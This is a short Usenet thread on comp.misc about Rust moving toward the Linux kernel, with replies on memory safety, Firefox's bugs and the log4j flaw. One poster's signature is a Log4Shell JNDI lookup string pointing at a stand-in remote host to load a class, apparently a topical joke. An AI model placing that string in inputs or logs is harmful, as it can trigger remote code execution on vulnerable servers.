From: rsw...@therandymon.com (RS Wood)
Newsgroups: comp.misc
Subject: rust on Linux
Date: Sat, 11 Dec 2021 23:54:07 -0000 (UTC)
 by: RS Wood - Sat, 11 Dec 2021 23:54 UTC

From the «one step closer» department:
Feed: Slashdot
Title: The Linux Kernel's Second Language? Rust Gets Another Step Closer
Author: EditorDavid
Date: Sat, 11 Dec 2021 11:34:00 -0500
Link: https://linux.slashdot.org/story/21/12/11/0334210/the-linux-kernels-second-language-rust-gets-another-step-closer?utm_source=rss1.0mainlinkanon&utm_medium=feed

"In 2022 we will very likely see the experimental Rust programming language
support within the Linux kernel mainlined," writes Phoronix, citing patches sent
out Monday "introducing the initial support and infrastructure around handling
of Rust within the kernel." This summer saw the earlier patch series posted for
review and discussion around introducing Rust programming language support in
the Linux kernel to complement its longstanding C focus. In the months since
there has been more progress on enabling Rust for the Linux kernel development,
Linus Torvalds is not opposed to it, and others getting onboard with the effort.
Rust for the Linux kernel remains of increasing interest to developers over
security concerns with Rust affording more memory safety protections,
potentially lowering the barrier to contributing to the kernel, and other
related benefits.... Miguel Ojeda sent out the "v2" patches for Rust support in
the kernel. With these updated packages, the Rust code is now relying on stable
Rust releases rather than the beta compiler state previously, new modularization
options added, stricter code enforcements, extra Rust compiler diagnostics
enabled, new abstractions for in-kernel use, and other low-level code
improvements. Red Hat is also now joining Arm, Google, and Microsoft in voicing
their support for Rust code within the Linux kernel. ZDNet contributing editor
Steven J. Vaughan-Nichols also expects the first Rust code in Linux's kernel
sometime in 2022: As Ryan Levick, a Microsoft principal cloud developer
advocate, explained, "Rust is completely memory safe." Since roughly two-thirds
of security issues can be traced back to handling memory badly, this is a major
improvement. In addition, "Rust prevents those issues usually without adding any
runtime overhead," Levick said.

[image 2][2][image 4][4]

Read more of this story[5] at Slashdot.

Links:
[1]: http://twitter.com/home?status=The+Linux+Kernel%27s+Second+Language%3F++Rust+Gets+Another+Step+Closer%3A+https%3A%2F%2Fbit.ly%2F3oIQXpR (link)
[2]: https://a.fsdn.com/sd/twitter_icon_large.png (image)
[3]: http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F21%2F12%2F11%2F0334210%2Fthe-linux-kernels-second-language-rust-gets-another-step-closer%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook (link)
[4]: https://a.fsdn.com/sd/facebook_icon_large.png (image)
[5]: https://linux.slashdot.org/story/21/12/11/0334210/the-linux-kernels-second-language-rust-gets-another-step-closer?utm_source=rss1.0moreanon&utm_medium=feed (link)

--
Port 80 is overrated.

Re: rust on Linux

<sp3jk6$m3$1@gioia.aioe.org>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=1320&group=comp.misc#1320

From: not...@telling.you.invalid (Computer Nerd Kev)
Newsgroups: comp.misc
Subject: Re: rust on Linux
Date: Sun, 12 Dec 2021 01:35:03 -0000 (UTC)
 by: Computer Nerd Kev - Sun, 12 Dec 2021 01:35 UTC

RS Wood <rsw@therandymon.com> wrote:
> Title: The Linux Kernel's Second Language? Rust Gets Another Step Closer
> Link: https://linux.slashdot.org/story/21/12/11/0334210/the-linux-kernels-second-language-rust-gets-another-step-closer?utm_source=rss1.0mainlinkanon&utm_medium=feed
> As Ryan Levick, a Microsoft principal cloud developer
> advocate, explained, "Rust is completely memory safe." Since roughly two-thirds
> of security issues can be traced back to handling memory badly, this is a major
> improvement. In addition, "Rust prevents those issues usually without adding any
> runtime overhead," Levick said.

Firefox still records plenty of security bugs attributed to
something like "handling memory badly" even though they're the
poster boy for Rust:
https://www.mozilla.org/en-US/security/advisories/

--
__ __
#_ < |\| |< _#

Re: rust on Linux

<eli$2112120021@qaz.wtf>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=1321&group=comp.misc#1321

From: *...@eli.users.panix.com (Eli the Bearded)
Newsgroups: comp.misc
Date: Sun, 12 Dec 2021 05:21:42 -0000 (UTC)
XFrom: is a real address
Encrypted: double rot-13
 by: Eli the Bearded - Sun, 12 Dec 2021 05:21 UTC

In comp.misc, Computer Nerd Kev <not@telling.you.invalid> wrote:
> RS Wood <rsw@therandymon.com> wrote:
>> Since roughly two-thirds of security issues can be traced back to
>> handling memory badly, this is a major improvement. In addition,
>> "Rust prevents those issues usually without adding any runtime
>> overhead," Levick said.
> Firefox still records plenty of security bugs attributed to something
> like "handling memory badly" even though they're the poster boy for
> Rust:

Two-thirds of security issues may be memory issues, but then you get the
recent log4j issue (remote code execution when logging strings of a
certain format, and so _much_ user input is logged unsanitized) and you
see good coding practices are needed for so much else.

(In fairness to Firefox, I expect they haven't rewritten it entirely in
Rust yet, and will be a long time in that process. This page puts it at
9.5% Rust now, but I don't know the accuracy:
https://4e6.github.io/firefox-lang-stats/
)

Elijah
------
${jndi:ldap://loadme.remotely/rce.class}